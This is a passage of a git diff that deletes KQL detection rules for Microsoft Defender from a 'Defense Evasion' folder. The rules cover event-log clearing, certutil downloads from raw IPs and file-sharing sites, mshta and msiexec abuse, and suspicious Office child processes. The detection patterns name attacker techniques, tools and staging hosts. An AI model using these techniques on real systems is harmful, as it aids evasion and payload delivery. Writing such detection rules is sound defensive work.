-| where (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) or ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and FolderPath endswith "\\wevtutil.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Executable_File_Creation.kql b/Defense Evasion/Suspicious_Executable_File_Creation.kql
deleted file mode 100644
index e8188447..00000000
--- a/Defense Evasion/Suspicious_Executable_File_Creation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/09/05
-// Level: high
-// Description: Detect creation of suspicious executable file names.
-Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
-
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql b/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql
deleted file mode 100644
index 95f75b3a..00000000
--- a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: medium
-// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not(((FolderPath contains "\\{" and FolderPath contains "}\\") or FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql b/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql
deleted file mode 100644
index 36f6b599..00000000
--- a/Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/23
-// Level: medium
-// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extexport_Execution.kql b/Defense Evasion/Suspicious_Extexport_Execution.kql
deleted file mode 100644
index 35568b7e..00000000
--- a/Defense Evasion/Suspicious_Extexport_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extexport.exe loads dll and is execute from other folder the original path
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Extexport.exe" or FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index dcfdf274..00000000
--- a/Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Extract data from cab file and hide it in an alternate data stream
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "extrac32.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql b/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql
deleted file mode 100644
index d2f5c2de..00000000
--- a/Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/09
-// Level: high
-// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index f12091dd..00000000
--- a/Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// Tags: attack.persistence, attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql
deleted file mode 100644
index 50e632ee..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql
deleted file mode 100644
index e9033362..00000000
--- a/Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 195823a7..00000000
--- a/Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql b/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql
deleted file mode 100644
index 9f95881c..00000000
--- a/Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
-// Tags: attack.t1036.005, attack.defense_evasion
-DeviceFileEvents
-| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_GUP_Usage.kql b/Defense Evasion/Suspicious_GUP_Usage.kql
deleted file mode 100644
index 4b5e7075..00000000
--- a/Defense Evasion/Suspicious_GUP_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/06
-// Level: high
-// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql b/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql
deleted file mode 100644
index da1a04b7..00000000
--- a/Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-WindowsApps is by default in the path where PowerShell is executed.
-So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-
-// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_HH.EXE_Execution.kql b/Defense Evasion/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Defense Evasion/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql b/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql
deleted file mode 100644
index a625bfda..00000000
--- a/Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/09
-// Level: informational
-// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql b/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql
deleted file mode 100644
index 04a154d3..00000000
--- a/Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql b/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql
deleted file mode 100644
index 8b9e448e..00000000
--- a/Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects execution of javascript code using "mshta.exe".
-// Tags: attack.defense_evasion, attack.t1218.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql b/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql
deleted file mode 100644
index ab40eb86..00000000
--- a/Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/11/07
-// Level: medium
-// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
-
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql b/Defense Evasion/Suspicious_MSDT_Parent_Process.kql
deleted file mode 100644
index 294e0977..00000000
--- a/Defense Evasion/Suspicious_MSDT_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql b/Defense Evasion/Suspicious_MSHTA_Child_Process.kql
deleted file mode 100644
index 0e72056c..00000000
--- a/Defense Evasion/Suspicious_MSHTA_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
-// Tags: attack.defense_evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql b/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018/04/06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql b/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index 271488d2..00000000
--- a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/11/17
-// Level: medium
-// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql b/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql
deleted file mode 100644
index 4facc676..00000000
--- a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
-// Tags: attack.t1218.007, attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql b/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql
deleted file mode 100644
index 367b993a..00000000
--- a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
